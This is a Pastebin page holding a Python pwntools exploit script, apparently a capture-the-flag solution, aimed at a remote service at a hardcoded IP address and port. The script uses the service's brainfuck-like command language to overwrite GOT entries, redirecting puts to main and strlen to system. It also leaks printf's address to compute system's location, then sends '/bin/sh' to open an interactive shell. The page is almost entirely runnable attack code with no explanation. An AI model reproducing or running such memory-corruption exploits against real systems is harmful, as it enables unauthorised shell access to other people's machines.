Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import sys
- def decrease_address():
- return ":<"
- def increase_address():
- return ":>"
- def decrease_value():
- return ":-"
- def increase_value():
- return ":+"
- def put_value():
- return "::"
- def set_value():
- return ":."
- def xor_value():
- return ":_"
- HOST = '69.90.132.40'
- PORT = 4001
- r = remote(HOST,PORT)
- data = 0x0804A080
- fu = 0x0804A060
- main = 0x080486DE
- # stage 1: overwrite puts_got => main
- r.recvuntil("Enter your code:")
- payload = decrease_address()*(data-fu)
- payload += set_value()
- payload += set_value()
- payload += increase_address()+set_value()
- payload += increase_address()+set_value()
- payload += increase_address()+set_value()
- r.sendline(payload)
- r.send("\x1C") # puts@plt 0x0804A01C
- r.send(p32(main))
- r.recvuntil("Enter your code:")
- # stage 2: leak printf => find system address
- payload = decrease_address()*(data-fu)
- payload += set_value()
- payload += put_value()
- payload += increase_address()+put_value()
- payload += increase_address()+put_value()
- payload += increase_address()+put_value()
- r.sendline(payload)
- r.send("\x0C") # printf_got
- res = ""
- while 1:
- res += r.recv(1)
- if len(res)==4:
- break
- sleep(0.1)
- printf = u32(res)
- print hex(printf)
- r.recvuntil("Enter your code:")
- offset_system = 59104
- system = printf-offset_system
- print hex(system)
- # # stage 3: overwrite strlen => system
- payload = decrease_address()*(data-fu)
- payload += set_value()
- payload += set_value()
- payload += increase_address()+set_value()
- payload += increase_address()+set_value()
- payload += increase_address()+set_value()
- r.sendline(payload)
- r.send("\x20") # strlen_got 0x804A020
- r.send(p32(system))
- r.recvuntil("Enter your code:")
- # stage 4: input strlen("/bin/sh") => system("/bin/sh")
- r.sendline("/bin/sh\x00")
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement